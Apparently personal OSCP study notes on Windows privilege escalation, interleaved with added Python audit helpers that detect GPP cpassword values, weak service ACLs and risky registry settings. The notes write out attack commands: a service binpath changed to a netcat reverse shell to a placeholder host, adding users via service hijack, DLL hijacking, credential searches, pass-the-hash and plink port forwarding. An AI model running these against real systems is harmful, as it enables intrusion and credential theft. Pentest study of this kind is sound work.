My OSCP Preparation Notes

Manual Priv Check


------------------------------------------------------
USE WMIC: to extract
processes, services, user accounts, user groups,
network interfaces, hard drive information, installed Windows patches,
programs that run at startup, list of installed software,
network share information, information about the OS and time zone

tips: based on the OS version and service pack, look for the respective KB patches
wmic qfe get Caption, Description, HotFixID, InstalledOn | findstr /C:"KB.." /C:"KB.."
-------------------------------------------------------

In case of mass rollout

> Files left behind by the administrator during the installation process
> configuration files with sensitive info
> may contain a password in plaintext or in Base64
sysprep.inf {clear text}, sysprep.xml {Base64 encoded}
Unattended.xml {Base64}

> Group policy {used to create users on the local domain} //Tools: PowerSploit
Groups.xml stored in SYSVOL {password file; any authenticated domain user can read it}
AES encrypted with a static key published on the MSDN website (cPassword attribute)
> similar policy files Services.xml, ScheduledTasks.xml, Printers.xml, DataSources.xml may contain cPassword
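An added audit helper (not from these notes or from PowerSploit/Metasploit) that walks a copy of SYSVOL for the policy files named above and reports every cpassword attribute it finds, without decrypting anything; the SYSVOL layout under `Policies/<GUID>/Machine/Preferences` and the two constructed policy files are assumptions for the demo:

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Group Policy Preference files that can carry a cpassword attribute: the ones named in the
# notes above plus Drives.xml, which belongs to the same family. Matched case-insensitively.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "printers.xml", "datasources.xml", "drives.xml"}


def _attr(elem, *names):
    """Case-insensitive attribute lookup (real files write 'cpassword', writeups 'cPassword')."""
    lowered = {k.lower(): v for k, v in elem.attrib.items()}
    return next((lowered[n.lower()] for n in names if n.lower() in lowered), None)


def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree; return (relative path, tag, account, cpassword) for every hit.
    The value is reported exactly as stored; this is a detector, it does not decrypt."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed policy file: skip it rather than abort the audit
            for elem in root.iter():
                secret = _attr(elem, "cpassword")
                if secret is None:
                    continue
                # Groups.xml uses userName, Services.xml accountName, ScheduledTasks.xml runAs,
                # Printers/DataSources/Drives username; fall back to the element's own name.
                account = _attr(elem, "userName", "accountName", "runAs", "name") or "?"
                hits.append((os.path.relpath(path, sysvol_root), elem.tag, account, secret))
    return hits


# Constructed sample policy files; the cpassword values are placeholders, not real ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" image="2">
    <Properties action="C" userName="helpdesk" cpassword="CONSTRUCTED-GROUPS-VALUE" acctDisabled="0"/>
  </User>
</Groups>
"""
SAMPLE_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <Task clsid="{2DEECB1C-261F-4e13-9B21-16FB83BC03BD}" name="Backup" image="0">
    <Properties action="C" name="Backup" runAs="CORP\\svc_backup" cpassword="CONSTRUCTED-TASK-VALUE"/>
  </Task>
</ScheduledTasks>
"""


def demo():
    # Build a constructed SYSVOL-like tree in a temp dir and run the detector over it.
    with tempfile.TemporaryDirectory() as root:
        prefs = os.path.join(root, "corp.local", "Policies", "{POLICY-GUID}", "Machine", "Preferences")
        for sub, body in (("Groups", SAMPLE_GROUPS_XML), ("ScheduledTasks", SAMPLE_TASKS_XML)):
            os.makedirs(os.path.join(prefs, sub))
            with open(os.path.join(prefs, sub, sub + ".xml"), "w", encoding="utf-8") as fh:
                fh.write(body)
        return sorted(find_cpasswords(root))
```

Point `find_cpasswords` at a mounted or copied `\\<dc>\SYSVOL` share to audit a real domain; any hit means the policy should be removed and the account's password rotated.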


----------------------------------------------------------
Strange registry settings:

> AlwaysInstallElevated with a DWORD value of 1 {if enabled, allows any *.msi to install as NT AUTHORITY\SYSTEM}
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated {both this and the one above must have a DWORD value of 1}

> dir /s *pass* == *cred* == *vnc* == *.config* {search for files with any of these keywords}

> findstr /si password *.xml *.ini *.txt {grep for "password" in files with specific extensions}

> reg query HKLM /f password /t REG_SZ /s {grep for "password" in the registry}
> reg query HKCU /f password /t REG_SZ /s

-----------------------------------------------------------

Last, look at Windows services and folder/file permissions:
> find and use weak permissions to escalate
Permissions that can give a PE shell
****************************************************
SERVICE_CHANGE_CONFIG ---> can reconfigure the service binary
WRITE_DAC ---> can reconfigure permissions, leading to SERVICE_CHANGE_CONFIG
WRITE_OWNER ---> can become owner, then reconfigure permissions
GENERIC_WRITE ---> includes SERVICE_CHANGE_CONFIG
GENERIC_ALL ---> includes SERVICE_CHANGE_CONFIG
****************************************************
> Step 1: check access rights with accesschk.exe {Microsoft Sysinternals Suite}

> Step 2: find services whose parameters we can reconfigure
sc qc Spooler {query the configuration of a Windows service}
accesschk.exe -ucqv * {list all services with their permissions}
accesschk.exe -ucqv <service name> {see the permissions the user has on one service}

> Note: low-privileged users generally belong to NT AUTHORITY\Authenticated Users
Just in case, check which groups the user belongs to (e.g. Power Users) if it is not Authenticated Users

SO RESULTS {if the user belongs to the NT AUTHORITY\Authenticated Users group}
accesschk.exe -uwcqv "Authenticated Users" * {lists the big security fails on Windows XP SP0 and SP1}
\\ Resolved in Windows XP SP2 {on other XP SPs the service can be reconfigured and code added to get PE}

EX: sc qc upnphost {accesschk.exe -ucqv upnphost shows RW access}
THEN: sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
net start upnphost
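An added example (not from these notes or from Sysinternals) that turns the permission table above into a check: it parses `accesschk.exe -ucqv *` output and flags services where a low-privileged principal holds any right that allows reconfiguring the service. The line layout of the output and the two constructed services are assumptions:

```python
import re

# Rights from the table above that let the holder reconfigure the service (and so its binary).
# SERVICE_ALL_ACCESS is listed too because it is a superset of SERVICE_CHANGE_CONFIG.
DANGEROUS_RIGHTS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
                    "GENERIC_WRITE", "GENERIC_ALL", "SERVICE_ALL_ACCESS"}
# Principals that every low-privileged logon session is a member of.
LOW_PRIV_PRINCIPALS = {"NT AUTHORITY\\Authenticated Users", "BUILTIN\\Users",
                       "Everyone", "NT AUTHORITY\\INTERACTIVE"}
_PRINCIPAL = re.compile(r"^(RW|R|W)\s+(.+)$")


def parse_accesschk(text):
    """Parse `accesschk.exe -ucqv *` output into {service: {principal: set(rights)}}.
    Assumed layout: service name at column 0, one line per principal prefixed with
    RW / R / W at indent 2, then the individual rights indented further beneath it."""
    services, service, principal = {}, None, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        if indent == 0:
            service, principal = line, None
            services[service] = {}
        elif "Mandatory Level" in line or service is None:
            continue  # integrity-label line, or text before the first service
        elif indent <= 2 and _PRINCIPAL.match(line):
            principal = _PRINCIPAL.match(line).group(2)
            services[service][principal] = set()
        elif principal is not None:
            services[service][principal].add(line)
    return services


def weak_services(services):
    """Return [(service, principal, [dangerous rights])] for low-privileged principals."""
    findings = []
    for svc, acl in services.items():
        for principal, rights in acl.items():
            bad = sorted(rights & DANGEROUS_RIGHTS)
            if principal in LOW_PRIV_PRINCIPALS and bad:
                findings.append((svc, principal, bad))
    return findings


# Constructed sample in the accesschk -ucqv layout: upnphost is misconfigured, Spooler is not.
SAMPLE_OUTPUT = """\
upnphost
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\Authenticated Users
        SERVICE_ALL_ACCESS
Spooler
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  R  NT AUTHORITY\\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        READ_CONTROL
"""


def demo():
    return weak_services(parse_accesschk(SAMPLE_OUTPUT))
```

Every finding is a service whose ACL should be tightened so that only SYSTEM and Administrators hold configuration rights.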
----------------------------------------------------------------
File/folder permissions: {if the OS can't be attacked directly}

> Exploiting weak folder privileges via DLL hijacking
If we have write access to a folder the application loads a DLL from, replace the DLL with our own and
when the application tries to invoke it, it will run our DLL
An application loads a DLL by name and searches for it in this order:
1. the directory the application resides in
2. if that fails, the 32-bit system directory C:\Windows\System32
3. the 16-bit system directory C:\Windows\System
4. the Windows directory C:\Windows ***if we have write access here, we win*****
5. the current working directory {CWD}
6. the directories in the PATH environment variable

>>>> Now, to get local PE, the following must hold together:
Windows DLL search order
DLL hijacking vulnerability {use Process Monitor and start/stop SYSTEM-privileged services {services.msc to start/stop a service}}
Weak folder permissions
> start service > grep service name > check the service's parameters in the registry > check the DLLs it invokes
>> disassemble the found DLL (IDA) and search for the DLLs it loads

Windows services vulnerable on Windows 7 (32/64)
-----

IKE and AuthIP IPsec Keying Modules (IKEEXT) -- loads wlbsctrl.dll
Windows Media Center Receiver Service (ehRecvr) -- ehETW.dll
Windows Media Center Scheduler Service (ehSched) -- ehETW.dll {default off}

schtasks.exe /run /I /TN "" {run a scheduled task by name}


Second special case of DLL hijacking {examine all the binpaths of Windows services, scheduled tasks and startup tasks}
-------


Note: running accesschk.exe for the first time presents a GUI EULA; to bypass it run
accesschk.exe /accepteula ... ... ...


== Stored credentials ==

## Search for credentials within:
## Unattend credentials are stored in base64 and can be decoded manually with base64
## (the decoded value is UTF-16LE and Windows appends the literal suffix "Password"; this sample decodes to "passwordPassword"):
## user@host $ echo cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA= | base64 -d | iconv -f UTF-16LE -t UTF-8
dir c:\unattend.xml

## Metasploit Framework enum_unattend module:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb

## Metasploit Framework gather credentials (GPP) module:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb

type c:\sysprep.inf
type c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /S pass *.txt *.xml *.ini // run from C:\

#find out what groups a user is part of
net user <userName> /domain | find "Group"

== Windows Registry ==

VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

#is UAC enabled ?
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
EnableLUA REG_DWORD 0x0 // NO
EnableLUA REG_DWORD 0x1 // YES
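An added example (not from these notes) covering the AlwaysInstallElevated queries earlier on the page and the EnableLUA query just above: it parses plain `reg query` text output and applies both checks, including the rule that AlwaysInstallElevated only takes effect when set to 1 in HKLM and HKCU together. The output layout and the constructed sample are assumptions:

```python
import re

# Keys (below the hive) that the notes query for these two settings.
INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
UAC_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"


def parse_reg_query(text):
    """Parse `reg query` text output into {full key path: {value name: (type, data)}}.
    Assumed layout: key paths at column 0, each value indented with its name, type
    and data separated by runs of spaces; blank and "End of search" lines are ignored."""
    result, key = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("End of search"):
            continue
        if not raw.startswith(" "):
            key = raw.strip()
            result.setdefault(key, {})
            continue
        parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
        if key is None or len(parts) < 2:
            continue
        result[key][parts[0]] = (parts[1], parts[2] if len(parts) == 3 else "")
    return result


def _dword(values, name):
    """Return a REG_DWORD value as int (reg query prints it as hex, e.g. 0x1), else None."""
    entry = values.get(name)
    return int(entry[1], 16) if entry and entry[0] == "REG_DWORD" else None


def audit_registry(reg):
    """Apply the notes' checks: AlwaysInstallElevated in both hives, and EnableLUA."""
    hklm_aie = hkcu_aie = enable_lua = None
    for key, values in reg.items():
        hive, _, subkey = key.partition("\\")
        if subkey.lower() == INSTALLER_KEY.lower():
            if hive == "HKEY_LOCAL_MACHINE":
                hklm_aie = _dword(values, "AlwaysInstallElevated")
            elif hive == "HKEY_CURRENT_USER":
                hkcu_aie = _dword(values, "AlwaysInstallElevated")
        elif subkey.lower() == UAC_KEY.lower():
            enable_lua = _dword(values, "EnableLUA")
    findings = []
    if hklm_aie == 1 and hkcu_aie == 1:
        findings.append("AlwaysInstallElevated=1 in HKLM and HKCU: any user's .msi installs as SYSTEM")
    elif hklm_aie == 1 or hkcu_aie == 1:
        findings.append("AlwaysInstallElevated=1 in one hive only: not effective, but clear the policy")
    if enable_lua == 0:
        findings.append("EnableLUA=0: UAC is disabled")
    return findings


# Constructed sample, concatenated from the three reg query commands in the notes.
SAMPLE_OUTPUT = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    EnableLUA    REG_DWORD    0x0
"""


def demo():
    return audit_registry(parse_reg_query(SAMPLE_OUTPUT))
```

The same parser handles the `reg query HKLM /f password /t REG_SZ /s` output, since `maxsplit=2` keeps multi-space data intact.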


SNMP parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

Putty clear text proxy credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]

## Change the upnphost service binary
sc qc upnphost
sc config upnphost binpath= "net user /add"
sc config upnphost obj= ".\LocalSystem" password= ""
net stop upnphost
net start upnphost

## copy all files in the remote directory to the local directory (ftp)
mget * ## confirm with yes on all files, or run `prompt` first to turn the per-file confirmation off

## copy multiple files from the local machine to the remote machine (ftp)
mput * ## same: confirm with yes on all files, or run `prompt` first


#Copy a file in cmd
copy FreeSSHDService.ini c:\"Program Files"\freeSSHd /y

#pass the hash on Windows
pth-winexe -U username%hash //<target ip>
#after the % comes the password hash (LM:NTLM)
# aad3b435b51404eeaad3b435b51404ee is the blank LM hash


#Exec commands on remote Windows machine
PsExec.exe \\<target ip>

#get a file from Kali to the remote Windows machine
TFTP.EXE -i <target ip>

#remote port forwarding
#from Windows -> Kali
plink.exe -l root -pw Parolaroot -R 445:x.x.x.x:445

#Redirect port with plink.exe
plink -P 22 -l root -pw some_password -C -R 445:x.x.x.x:445 x.x.x.x

== SYSINTERNALS ==
## Use the tools in

https://github.com/crsftw/OSCP-cheat-sheet/tree/master/privesc/tools_win


## use -accepteula to avoid the GUI asking to accept the EULA
## PsExec.exe -accepteula

PsExec64.exe -accepteula \\<target ip>
powershell -ExecutionPolicy Bypass C:\Users\Public\PsExec.exe -accepteula \\localhost -u user -p XXXX cmd

PsExec - execute processes remotely
PsFile - shows files opened remotely
PsGetSid - display the SID of a computer or a user
PsInfo - list information about a system
PsPing - measure network performance
PsKill - kill processes by name or process ID
PsList - list detailed information about processes
PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
PsLogList - dump event log records
PsPasswd - changes account passwords
PsService - view and control services
PsShutdown - shuts down and optionally reboots a computer
PsSuspend - suspends processes
PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)